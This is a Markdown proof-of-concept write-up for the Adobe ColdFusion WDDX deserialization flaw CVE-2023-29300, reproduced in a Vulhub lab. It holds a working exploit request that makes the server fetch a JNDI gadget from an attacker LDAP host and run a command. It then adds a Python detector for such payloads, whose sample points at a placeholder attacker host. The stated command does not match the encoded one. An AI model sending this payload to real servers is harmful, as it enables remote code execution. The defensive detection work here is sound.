Awesome-POC/中间件漏洞/Adobe ColdFusion XML 反序列化命令执行漏洞 CVE-2023-29300.md
2024-11-06 14:10:36 +08:00



# Adobe ColdFusion XML Deserialization Command Execution Vulnerability CVE-2023-29300
## Vulnerability Description
Adobe ColdFusion is a dynamic web server product from the US company Adobe; the CFML (ColdFusion Markup Language) it runs is a programming language designed for web applications.
Adobe ColdFusion versions 2018.0.16, 2021.0.6, 2023.0.0.330468 and earlier contain an XML deserialization vulnerability. An attacker can exploit it to invoke arbitrary Java setter methods and ultimately execute arbitrary commands.
References:
- [https://blog.projectdiscovery.io/adobe-coldfusion-rce/](https://blog.projectdiscovery.io/adobe-coldfusion-rce/)
- [https://xz.aliyun.com/t/13413](https://xz.aliyun.com/t/13413)
## Environment Setup
Use Vulhub to start an Adobe ColdFusion 2018.0.15 server:
```
docker compose up -d
```
After a short wait the environment is up. Visit `http://your-vps-ip:8500/CFIDE/administrator/index.cfm` and enter the password `vulhub` to complete the Adobe ColdFusion installation.
![](images/Adobe%20ColdFusion%20XML%20反序列化命令执行漏洞%20CVE-2023-29300/image-20240226160629443.png)
## Vulnerability Reproduction
To exploit this vulnerability you first need an exploitable setter method to serve as the gadget. The most common gadget is `com.sun.rowset.JdbcRowSetImpl`, which is used to perform JNDI injection and execute arbitrary commands.
First start a malicious JNDI server and load `CommonsBeanutils1` as the inner deserialization gadget. Several tools on GitHub can do this, for example [https://github.com/rebeyond/JNDInjector/releases](https://github.com/rebeyond/JNDInjector/releases)
![](images/Adobe%20ColdFusion%20XML%20反序列化命令执行漏洞%20CVE-2023-29300/image-20240226154836838.png)
Then substitute the malicious LDAP address into the following request and send it:
```
POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 333
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://192.168.24.1/HiJbyQaUgJ/CommonsBeanutils1/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL2F3ZXNvbWVfcG9jIn0=</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>
```
As shown, `touch /tmp/success` was executed successfully:
![](images/Adobe%20ColdFusion%20XML%20反序列化命令执行漏洞%20CVE-2023-29300/image-20240226154946942.png)
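The request above is what a WAF rule or log-review script needs to recognize. The following detection helper is an added example, not code from the Awesome-POC repository or from Vulhub: it pulls the WDDX packet out of a posted `argumentCollection` field, then flags any `struct` whose `type` attribute names the `com.sun.rowset.JdbcRowSetImpl` gadget (the page's payload pads the class name as `x...x`, so the check is a substring match rather than an exact comparison), the `dataSourceName` + `autoCommit` setter pair that makes `JdbcRowSetImpl` perform a JNDI lookup, and any JNDI URL scheme inside a `<string>` value. The sample request bodies and the `attacker.example.invalid` host are constructed for this example.

```python
"""Detect JdbcRowSetImpl/JNDI gadget payloads in ColdFusion WDDX request bodies.

Added example for CVE-2023-29300 write-ups; not part of the original page.
"""
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import parse_qs

# Gadget classes whose setters should never be reachable from an untrusted WDDX packet.
DANGEROUS_CLASSES = ("com.sun.rowset.JdbcRowSetImpl",)
# Schemes that a JdbcRowSetImpl data source name would resolve through JNDI.
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://", "dns://")
# Setter pair that triggers JdbcRowSetImpl.connect() and hence the JNDI lookup.
TRIGGER_SETTERS = {"dataSourceName", "autoCommit"}


def extract_wddx(body: str) -> Optional[str]:
    """Return the WDDX packet carried by a form body, or None if there is none."""
    fields = parse_qs(body, keep_blank_values=True)
    for value in fields.get("argumentCollection", []):
        if "<wddxPacket" in value:
            return value
    # Some clients post the raw packet without a form field; accept that too.
    return body if body.lstrip().startswith("<wddxPacket") else None


def inspect_wddx(packet: str) -> List[str]:
    """Return findings for one WDDX packet; an empty list means nothing suspicious."""
    findings: List[str] = []
    try:
        root = ET.fromstring(packet)
    except ET.ParseError as exc:
        return [f"unparseable WDDX packet: {exc}"]

    for struct in root.iter("struct"):
        type_attr = struct.get("type", "")
        # Substring match: the class name may be padded (e.g. 'x...x') to dodge exact blocklists.
        if any(cls in type_attr for cls in DANGEROUS_CLASSES):
            findings.append(f"struct type names gadget class: {type_attr}")
        var_names = {var.get("name", "") for var in struct.findall("var")}
        if TRIGGER_SETTERS <= var_names:
            findings.append("setter pair dataSourceName+autoCommit (JNDI lookup trigger)")

    for string in root.iter("string"):
        text = (string.text or "").strip()
        if text.lower().startswith(JNDI_SCHEMES):
            findings.append(f"JNDI URL in string value: {text}")
    return findings


def inspect_form_body(body: str) -> List[str]:
    """Convenience wrapper: form body in, findings out (empty if no WDDX packet present)."""
    packet = extract_wddx(body)
    return inspect_wddx(packet) if packet else []


# Constructed sample bodies: the first mirrors the page's payload shape with a
# placeholder LDAP host, the second is an ordinary WDDX struct with no Java type.
SAMPLE_MALICIOUS = (
    "argumentCollection=<wddxPacket version='1.0'><header/><data>"
    "<struct type='xcom.sun.rowset.JdbcRowSetImplx'>"
    "<var name='dataSourceName'><string>ldap://attacker.example.invalid/a</string></var>"
    "<var name='autoCommit'><boolean value='true'/></var>"
    "</struct></data></wddxPacket>"
)
SAMPLE_BENIGN = (
    "argumentCollection=<wddxPacket version='1.0'><header/><data>"
    "<struct><var name='user'><string>alice</string></var></struct>"
    "</data></wddxPacket>"
)

if __name__ == "__main__":
    for label, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, inspect_form_body(body))
```

The three checks are deliberately independent: a payload that swaps in a different gadget class still trips the setter-pair or JNDI-URL check, and one that hides the URL behind a lookalike scheme still trips the class-name check. Run the module directly to see the findings for both constructed bodies; in a pipeline, feed it the decoded POST body from the access or application logs.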